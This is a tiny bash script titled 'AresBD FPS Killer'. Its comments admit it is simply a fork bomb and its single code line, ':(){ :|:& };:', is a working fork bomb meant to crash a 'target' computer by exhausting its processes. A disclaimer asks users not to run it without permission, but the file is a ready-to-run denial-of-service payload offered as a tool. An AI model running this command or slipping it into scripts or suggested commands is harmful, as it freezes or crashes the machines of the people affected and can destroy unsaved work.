#!/bin/bash
# AresBD FPS Killer by Stsosz
# All this is is a fork bomb XD
# Don't be an asshole. Don't use this without permission. I'm not responsible for
# Any stupid stuff you do with AresBD. 
# Chances are that this will crash the target computer.

:(){ :|:& };: